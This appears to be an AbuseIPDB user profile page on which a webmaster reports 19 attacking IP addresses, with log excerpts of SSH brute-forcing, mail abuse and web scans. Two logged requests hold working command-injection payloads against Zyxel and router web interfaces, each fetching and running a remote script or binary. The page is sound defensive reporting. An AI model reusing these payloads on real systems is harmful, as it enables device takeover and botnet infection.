aconfa.net - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User aconfa.net , the webmaster of aconfa.net, joined AbuseIPDB in January 2024 and has reported 19 IP addresses.

Standing (weight) is good.

INACTIVE USER WEBMASTER

IP	Date	Comment	Categories
🇨🇳 121.237.119.217	04 Apr 2025	fail2ban ssh	Brute-Force SSH
🇦🇺 114.77.129.38	04 Apr 2025	fail2ban triggered	SSH
🇵🇱 194.180.49.39	24 Jan 2025	троян на майнинг криптовалюты, also rdp bruteforce etc.	DDoS Attack FTP Brute-Force Phishing Port Scan Hacking Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇨🇭 82.146.216.187	02 Feb 2024	Aggressive scan for web apps	Web App Attack
🇬🇧 18.132.199.146	26 Jan 2024	"Cloud mapping experiment"	Bad Web Bot Web App Attack
🇧🇷 189.6.255.75	26 Jan 2024	GET ... /wlwmanifest.xml	Web App Attack
🇺🇸 204.93.180.13	23 Jan 2024	imap-login: Disconnected	Hacking Web App Attack
🇺🇸 104.156.155.22	21 Jan 2024	lots of Jan 21 15:29:45 server postfix/smtps/smtpd[5330]: SSL_accept error from unknown[104.156.155. ... show more lots of Jan 21 15:29:45 server postfix/smtps/smtpd[5330]: SSL_accept error from unknown[104.156.155.22]: -1 etc show less	DDoS Attack Email Spam Hacking Web App Attack
🇸🇬 104.250.52.152	20 Jan 2024	Jan 20 22:47:42 server postfix/smtps/smtpd[4212]: connect from unknown[104.250.52.152] Jan 20 22:47 ... show more Jan 20 22:47:42 server postfix/smtps/smtpd[4212]: connect from unknown[104.250.52.152] Jan 20 22:47:42 server postfix/smtps/smtpd[4212]: SSL_accept error from unknown[104.250.52.152]: -1 Jan 20 22:47:42 server postfix/smtps/smtpd[4212]: warning: TLS library problem: error:0A00010B:SSL routines::wrong version number:../ssl/record/ssl3_record.c:354: Jan 20 22:47:42 server postfix/smtps/smtpd[4212]: lost connection after CONNECT from unknown[104.250.52.152] Jan 20 22:47:42 server postfix/smtps/smtpd[4212]: disconnect from unknown[104.250.52.152] commands=0/0 show less	Email Spam Hacking Web App Attack
🇮🇳 159.65.157.61	15 Jan 2024	Jan 15 14:51:56 user=<admin>, method=PLAIN, rip=159.65.157.61, lip=, TLS: Connection closed,	Web App Attack
🇵🇱 31.0.8.92	13 Jan 2024	31.0.8.92 - - [13/Jan/2024:13:23:04 +0300] "GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IF ... show more 31.0.8.92 - - [13/Jan/2024:13:23:04 +0300] "GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}mips;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;" 400 255 "-" "-" show less	Hacking Exploited Host Web App Attack
🇳🇱 172.233.58.223	12 Jan 2024	172.233.58.223 - - [12/Jan/2024:15:23:58 +0300] "GET / HTTP/1.0" 200 994 "-" "-" 172.233.58.223 - - ... show more 172.233.58.223 - - [12/Jan/2024:15:23:58 +0300] "GET / HTTP/1.0" 200 994 "-" "-" 172.233.58.223 - - [12/Jan/2024:15:24:00 +0300] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 994 "-" "curl/7.54.0" 172.233.58.223 - - [12/Jan/2024:15:24:00 +0300] "GET / HTTP/1.1" 200 994 "-" "curl/7.54.0" 172.233.58.223 - - [12/Jan/2024:15:24:00 +0300] "GET /Portal0000.htm HTTP/1.1" 404 153 "-" "curl/7.54.0" 172.233.58.223 - - [12/Jan/2024:15:24:00 +0300] "GET /.git/HEAD HTTP/1.1" 404 153 "-" "curl/7.54.0" 172.233.58.223 - - [12/Jan/2024:15:24:00 +0300] "GET /nmaplowercheck1705062239 HTTP/1.1" 404 153 "-" "curl/7.54.0" 172.233.58.223 - - [12/Jan/2024:15:24:00 +0300] "GET / HTTP/1.1" 200 994 "-" "curl/7.54.0" 172.233.58.223 - - [12/Jan/2024:15:24:00 +0300] "GET / HTTP/1.0" 200 994 "-" "-" 172.233.58.223 - - [12/Jan/2024:15:24:00 +0300] "SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1" 400 157 etc show less	Hacking Web App Attack
🇺🇸 99.78.197.219	12 Jan 2024	[email protected] 7fdce4bf-70d2-4c2f-bf6f-db81c99bc899 <source_ip>99.78.197.219</source_i ... show more [email protected] 7fdce4bf-70d2-4c2f-bf6f-db81c99bc899 <source_ip>99.78.197.219</source_ip> <count>1</count> <policy_evaluated> <disposition>reject</disposition> <dkim>fail</dkim> <spf>fail</spf> </policy_evaluated> show less	Email Spam Spoofing
🇺🇸 207.171.184.29	12 Jan 2024	[email protected] 9acdee21-262a-4a6d-b70e-0bd4cd149697 <source_ip>207.171.184.29</source_ip> ... show more [email protected] 9acdee21-262a-4a6d-b70e-0bd4cd149697 <source_ip>207.171.184.29</source_ip> <count>1</count> <policy_evaluated> <disposition>reject</disposition> <dkim>fail</dkim> <spf>fail</spf> </policy_evaluated> show less	Email Spam Spoofing
🇺🇸 100.26.179.243	11 Jan 2024	100.26.179.243 - - [11/Jan/2024:19:49:16 +0300] "GET /.git/config HTTP/1.1" 404 125 "-" "Mozilla/5.0 ... show more 100.26.179.243 - - [11/Jan/2024:19:49:16 +0300] "GET /.git/config HTTP/1.1" 404 125 "-" "Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba" show less	Bad Web Bot Web App Attack
🇳🇱 185.224.128.191	11 Jan 2024	185.224.128.191 - - [11/Jan/2024:19:32:05 +0300] "GET /cgi-bin/luci/;stok=/locale?form=country&opera ... show more 185.224.128.191 - - [11/Jan/2024:19:32:05 +0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 400 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" show less	Hacking Web App Attack